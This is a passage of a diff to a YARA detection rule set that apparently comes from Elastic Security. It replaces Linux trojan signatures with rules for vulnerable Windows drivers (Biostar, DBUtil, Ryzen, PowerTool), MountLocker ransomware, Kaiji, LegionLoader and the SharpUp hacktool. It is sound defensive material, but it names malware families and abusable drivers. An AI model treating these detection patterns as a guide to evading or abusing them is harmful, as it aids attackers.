= "2021-09-16" + id = "9b01c718-ba36-4642-b27d-e9310d05d8a5" + date = "2023-01-22" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Marut.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "048ce8059be6697c5f507fb1912ac2adcedab87c75583dd84700984e6d0d81e6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Ryzen.yar#L23-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bb82d8c29127955d58dff58978605a9daa718425c74c4bce5ae3e53712909148" + logic_hash = "5734f6a249656f22a2a363b42ae77b5e6b7673bc96bad34b04b1be7f2b584b08" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4429ef9925aff797ab973f9a5b0efc160a516f425e3b024f22e5a5ddad26c341" - severity = 100 + tags = "FILE" + fingerprint = "18ad3df5ae549dddbe1f6f33db534b4fcfc603e0863f8262a8cb9c166a16af67" + threat_name = "Windows.VulnDriver.Ryzen" + severity = 49 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 20 89 34 24 FF D1 8B 44 24 0C 0F B6 4C 24 04 8B 54 24 08 85 D2 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 52 00 79 00 7A 00 65 00 6E 00 4D 00 61 00 73 00 74 00 65 00 72 00 44 00 72 00 69 00 76 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x07][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x06][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Bedevil_A1A72C39 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Biostar_D6Cc23Af : FILE { meta: - description = "Detects Linux Trojan Bedevil (Linux.Trojan.Bedevil)" + description = "Name: BS_HWMIO64_W10.sys, Version: 10.0.1806.2200" author = "Elastic Security" - id = "a1a72c39-c8a3-4372-bd1d-de6360c9c19e" - date = "2021-01-12" - modified = "2021-09-16" + id = "d6cc23af-4502-4b18-bd10-17495e6e1443" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Bedevil.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "017a9d7290cf327444d23227518ab612111ca148da7225e64a9f6ebd253449ab" - logic_hash = "227adcc340c38cebf56ea2f39b483c965dd46827d83afe5f866ca844c932da76" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Biostar.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8" + logic_hash = "6a1f5de3a0daf446ceb812a9f5749410a3a7752dce44e935adc288c95816f59d" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "65a66dc00e62f32fd088809f3c88ceb9d59d264ecff0d9f830c35dfa464baf43" + threat_name = "Windows.VulnDriver.Biostar" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 00 53 00 5F 00 48 00 57 00 4D 00 49 00 4F 00 36 00 34 00 5F 00 57 00 31 00 30 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x98][\x00-\x08]|[\x00-\xff][\x00-\x07])([\x00-\x0e][\x00-\x07]|[\x00-\xff][\x00-\x06])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0d][\x00-\x07]|[\x00-\xff][\x00-\x06]))/ + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version +} +rule ELASTIC_Windows_Vulndriver_Biostar_68682378 : FILE +{ + meta: + description = "Name: BS_I2cIo.sys, Version: 1.1.0.0" + author = "Elastic Security" + id = "68682378-9b49-4bec-b24c-aba8221a62fe" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Biostar.yar#L23-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a" + logic_hash = "8510de6fc33bde153f3bd4d1bb8b0d98ce69aae479d242c6043ac8c712dbb888" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "df974c8b5bb60b1b6e95d1c70c968dfca1f1e351f50eed29d215da673d45af19" + threat_name = "Windows.VulnDriver.Biostar" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 00 53 00 5F 00 49 00 32 00 63 00 49 00 6F 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version +} +rule ELASTIC_Windows_Vulndriver_Biostar_684A5123 : FILE +{ + meta: + description = "Name: BS_RCIO64.sys, Version: 10.0.0.1" + author = "Elastic Security" + id = "684a5123-cd84-4133-9530-30bfefd5ad1b" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Biostar.yar#L45-L65" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e" + logic_hash = "7c0c7e14f9b5085a87e5dbe27feb8e49bdb4d2fdcfbcbc643999d7969d118240" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "c92b058bbc8a708431bdbe8fc2e793c0a424aa79b25892c83153ffd32e1a89d3" + threat_name = "Windows.VulnDriver.Biostar" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 00 53 00 5F 00 52 00 43 00 49 00 4F 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version +} +rule ELASTIC_Windows_Vulndriver_Biostar_E0B6Cf55 : FILE +{ + meta: + description = "Detects Windows Vulndriver Biostar (Windows.VulnDriver.Biostar)" + author = "Elastic Security" + id = "e0b6cf55-c97d-4799-88a6-30ab0e880b0b" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Biostar.yar#L67-L85" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e" + logic_hash = "dccbf6fa46de1a8bc6438578b651055e2d02d15bd04461be74059e6fde40fca3" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "c38c456a008b847c42c45f824b125e7308b8aa41771d3db3d540690b13147abc" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "\\BS_RCIO.pdb" + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 +} +rule ELASTIC_Windows_Vulndriver_Powertool_044A8645 : FILE +{ + meta: + description = "Name: kEvP64.sys" + author = "Elastic Security" + id = "044a8645-cc90-4ab2-8519-e207583de60d" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_PowerTool.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c" + logic_hash = "b21c16cb72d003c505aa0ac4cc21b92513a100bad6870460090994c02cad875a" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "f79831f531f20cc1daeb86b860dffa02dd5a9d25c41cc1eff9f04eddbbd37864" + threat_name = "Windows.VulnDriver.PowerTool" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6B 00 45 00 76 00 50 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name +} +rule ELASTIC_Windows_Ransomware_Mountlocker_126A76E2 : FILE MEMORY +{ + meta: + description = "Detects Windows Ransomware Mountlocker (Windows.Ransomware.Mountlocker)" + author = "Elastic Security" + id = "126a76e2-8a97-4347-ac36-9437a512e16c" + date = "2021-06-10" + modified = "2021-08-23" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Mountlocker.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4a5ac3c6f8383cc33c795804ba5f7f5553c029bbb4a6d28f1e4d8fb5107902c1" + logic_hash = "5a5e157a245a75033abbe6bc7aa66fe6af6d91dc30abe1fdadce85f8f3905b1e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ea4762d6ba0b88017feda1ed68d70bedd1438bb853b8ee1f83cbca2276bfbd1e" + fingerprint = "08213f4474c7c8fd7a6e59c9ff139fb45f224109ad4e6162c12cff5ac85cb10c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 73 3A 20 1B 5B 31 3B 33 31 6D 25 64 1B 5B 30 6D 0A 00 1B 5B } + $a1 = "[SKIP] locker.dir.check > black_list name=%s" wide fullword + $a2 = "[OK] locker.dir.check > name=%s" wide fullword + $a3 = "[ERROR] locker.worm > execute pcname=%s" wide fullword + $a4 = "[INFO] locker.work.enum.net_drive > enum finish name=%s" wide fullword + $a5 = "[WARN] locker.work.enum.server_shares > logon on server error=%u pcname=%s" wide fullword condition: - all of them + any of them } -rule ELASTIC_Windows_Trojan_Lumma_693A5234 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Dbutil_Ffe07C79 : FILE { meta: - description = "Detects Windows Trojan Lumma (Windows.Trojan.Lumma)" + description = "Detects Windows Vulndriver Dbutil (Windows.VulnDriver.DBUtil)" author = "Elastic Security" - id = "693a5234-de8c-4801-8146-bb4d5378abc5" - date = "2024-06-05" - modified = "2024-06-12" + id = "ffe07c79-d97b-43ba-92b9-206bb4c7bdd4" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Lumma.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88340abcdc3cfe7574ee044aea44808446daf3bb7bf9fc60b16a2b1360c5d9c0" - logic_hash = "2b29ac9bc73f191bdbfc92601cab923aa9f2f3380c8123ee469ced3754625dd0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_DBUtil.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3" + logic_hash = "18b1c93c395b105f446b4c968441e0a43e42b1bd7efcf6501a89eb92cbd21824" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "9e51b8833b6fffe740f3c9f87a874dbf4d668d68307393b20cf9e4e69e899d3f" + tags = "FILE" + fingerprint = "16c22aba1e8c677cc22d3925dd7416a3c55c67271940289936a2cdc199a53798" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 02 0F B7 16 83 C6 02 66 85 D2 75 EF 66 C7 00 00 00 0F B7 11 } - $a2 = { 0C 0F B7 4C 24 04 66 89 0F 83 C7 02 39 F7 73 0C 01 C3 39 EB } + $str1 = "\\DBUtilDrv2_32.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Meterpreter_A82F5D21 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Dbutil_852Ba283 : FILE { meta: - description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" + description = "Detects Windows Vulndriver Dbutil (Windows.VulnDriver.DBUtil)" author = "Elastic Security" - id = "a82f5d21-3b01-4a05-a34a-6985c1f3b460" + id = "852ba283-6a03-44b6-b7e2-b00d1b0586e4" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_DBUtil.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5" + logic_hash = "78acd081c2517f9c53cb311481c0cc40cc3699b222afc290da1a3698e7bf75b7" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "aec919dfea62a8ed01dde4e8c63fbfa9c2a9720c144668460c00f56171c8db25" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "\\DBUtilDrv2_64.pdb" + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 +} +rule ELASTIC_Linux_Trojan_Kaiji_253C44De : FILE MEMORY +{ + meta: + description = "Detects Linux Trojan Kaiji (Linux.Trojan.Kaiji)" + author = "Elastic Security" + id = "253c44de-3f48-49f9-998d-1dec2981108c" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Meterpreter.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d76886222de7292e8a76717f6d49452f52aaffb957bb0326bcfc7a35c3fdfc6a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kaiji.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e31eb8880bb084b4c642eba127e64ce99435ea8299a98c183a63a2e6a139d926" + logic_hash = "81a07f60765f50c58b2c0f0153367ee570f36c579e9f88fb2f0e49ae5c08773f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b0adb928731dc489a615fa86e46cc19de05e251eef2e02eb02f478ed1ca01ec5" + fingerprint = "f390a16ca4270dc38ce1a52bbdc1ac57155f369a74005ff2a4e46c6d043b869e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56322,28 +56857,28 @@ rule ELASTIC_Linux_Trojan_Meterpreter_A82F5D21 : FILE MEMORY os = "linux" strings: - $a = { F8 02 74 22 77 08 66 83 F8 01 74 20 EB 24 66 83 F8 03 74 0C 66 83 } + $a = { EB 27 0F B6 1C 10 48 8B 74 24 40 48 8B BC 24 90 00 00 00 88 } condition: all of them } -rule ELASTIC_Linux_Trojan_Meterpreter_383C6708 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kaiji_535F07Ac : FILE MEMORY { meta: - description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" + description = "Detects Linux Trojan Kaiji (Linux.Trojan.Kaiji)" author = "Elastic Security" - id = "383c6708-0861-4089-93c3-4320bc1e7cfc" + id = "535f07ac-d727-4866-aaed-74d297a1092c" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Meterpreter.yar#L20-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d9d607f0bbc101f7f6dc0f16328bdd8f6ddb8ae83107b7eee34e1cc02072cb15" - logic_hash = "b0fd479722ab0808a4709cbacbb874282c48a425f4dbdaec9f74bc7f839c82e4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kaiji.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "28b2993d7c8c1d8dfce9cd2206b4a3971d0705fd797b9fde05211686297f6bb0" + logic_hash = "539977c1076b71873135cfe02153da87c0e9ac17122f04570977a22c92d2694f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6e9da04c91b5846b3b1109f9d907d9afa917fb7dfe9f77780e745d17b799b540" + fingerprint = "8853b2a1d5852e436cab2e3402a5ca13839b3cae6fbb56a74b047234b8c1233b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56351,27 +56886,28 @@ rule ELASTIC_Linux_Trojan_Meterpreter_383C6708 : FILE MEMORY os = "linux" strings: - $a = { 99 B6 10 48 89 D6 4D 31 C9 6A 22 41 5A B2 07 0F 05 48 96 48 } + $a = { 44 24 10 48 8B 4C 24 08 48 83 7C 24 18 00 74 26 C6 44 24 57 00 48 8B 84 24 98 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Meterpreter_621054Fe : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kaiji_Dcf6565E : FILE MEMORY { meta: - description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" + description = "Detects Linux Trojan Kaiji (Linux.Trojan.Kaiji)" author = "Elastic Security" - id = "621054fe-bbdf-445c-a503-ccba82b88243" - date = "2021-01-12" - modified = "2021-09-16" + id = "dcf6565e-8287-4d78-b103-53cfab192025" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Meterpreter.yar#L40-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "18f22bb0aa66ec2ecdaa9ca0e0d00ee59a2c9a3f231bd71915140e4464a4ea78" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kaiji.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "49f3086105bdc160248e66334db00ce37cdc9167a98faac98800b2c97515b6e7" + logic_hash = "2bc943e100548e9aacd97930b3230353be760c8a292dbbbd1d0b5646f647c4fe" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "13cb03783b1d5f14cadfaa9b938646d5edb30ea83702991a81cc4ca82e4637dc" + fingerprint = "381d6b8f6a95800fe0d20039f991ce82317f60aef100487f3786e6c1e63376e1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56379,27 +56915,28 @@ rule ELASTIC_Linux_Trojan_Meterpreter_621054Fe : FILE MEMORY os = "linux" strings: - $a = { 28 85 D2 75 0A 8B 50 2C 83 C8 FF 85 D2 74 03 8B 42 64 5D C3 55 } + $a = { 48 69 D2 9B 00 00 00 48 C1 EA 20 83 C2 64 48 8B 9C 24 B8 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Meterpreter_1Bda891E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Kaiji_91091Be3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Meterpreter (Linux.Trojan.Meterpreter)" + description = "Detects Linux Trojan Kaiji (Linux.Trojan.Kaiji)" author = "Elastic Security" - id = "1bda891e-a031-4254-9d0b-dc590023d436" - date = "2021-12-13" - modified = "2022-01-26" + id = "91091be3-8c9e-4d7a-8ca6-cd422afe0aa5" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Meterpreter.yar#L59-L76" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "74e7547472117de20159f5b158cee0ccacc02a9aba5e5ad64a52c552c966d539" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Kaiji.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dca574d13fcbd7d244d434fcbca68136e0097fefc5f131bec36e329448f9a202" + logic_hash = "3b55cb3be5775311af4dc90f9624448d30cc58ef1a42729f6ca4eb3b36ad8b06" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fc3f5afb9b90bbf3b61f144f90b02ff712f60fbf62fb0c79c5eaa808627aa0a1" + fingerprint = "f583bbef07f41e74ba9646a3e97ef114eb34b1ae820ed499dffaad90db227ca6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56407,57 +56944,181 @@ rule ELASTIC_Linux_Trojan_Meterpreter_1Bda891E : FILE MEMORY os = "linux" strings: - $a = { 11 62 08 F2 0F 5E D0 F2 0F 58 CB F2 0F 11 5A 10 F2 44 0F 5E C0 F2 0F } + $a = { 24 18 83 7C 24 1C 02 75 9E 8B 4C 24 64 8B 51 1C 89 54 24 5C } condition: all of them } -rule ELASTIC_Linux_Trojan_Sckit_A244328F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Legionloader_F91120C6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sckit (Linux.Trojan.Sckit)" + description = "Detects Windows Trojan Legionloader (Windows.Trojan.LegionLoader)" author = "Elastic Security" - id = "a244328f-1e12-4ae6-b583-ecf14a4b9d82" - date = "2021-04-06" - modified = "2021-09-16" + id = "f91120c6-395d-4c47-acd2-49c7eb1b8013" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sckit.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "685da66303a007322d235b7808190c3ea78a828679277e8e03e6d8d511df0a30" - logic_hash = "8001c9fcf9f8b70c3e27554156b0b26ddcd6cab36bf97cf3b89a4c43c9ad883c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_LegionLoader.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45670ffa9b24542ae84e3c9eb5ce609c2bcd29129215a7f37eb74b6211e32b22" + logic_hash = "760402587a9ca3d3e6602fe57d3346ea6f60ba5c8d3a902bf493233baab597b0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "eca152c730ecabbc9fe49173273199cb37b343d038084965ad880ddba3173f50" + fingerprint = "81476a8981ca0dbd7ac32073d6dc4362ae251ff06827c120e902f1aa3a53ce68" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 34 D0 04 08 BB 24 C3 04 08 CD 80 C7 05 A0 EE 04 } + $a = { 55 8B EC 83 EC 08 89 4D F8 8B 4D F8 E8 4F 01 00 00 0F B6 C0 85 C0 75 09 C7 45 FC 01 00 00 00 EB 07 C7 45 FC 00 00 00 00 0F B6 45 FC 8B E5 5D C3 55 8B EC 51 89 4D FC 8B 4D FC E8 21 01 00 00 8B } condition: all of them } -rule ELASTIC_Windows_Ransomware_Ransomexx_Fabff49C : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpup_E5C87C9A : FILE MEMORY { meta: - description = "Detects Windows Ransomware Ransomexx (Windows.Ransomware.Ransomexx)" + description = "Detects Windows Hacktool Sharpup (Windows.Hacktool.SharpUp)" author = "Elastic Security" - id = "fabff49c-8e1a-4020-b081-2f432532e529" - date = "2021-08-07" - modified = "2021-10-04" + id = "e5c87c9a-6b4d-49af-85d1-6bb60123c057" + date = "2022-10-20" + modified = "2022-11-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Ransomexx.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = 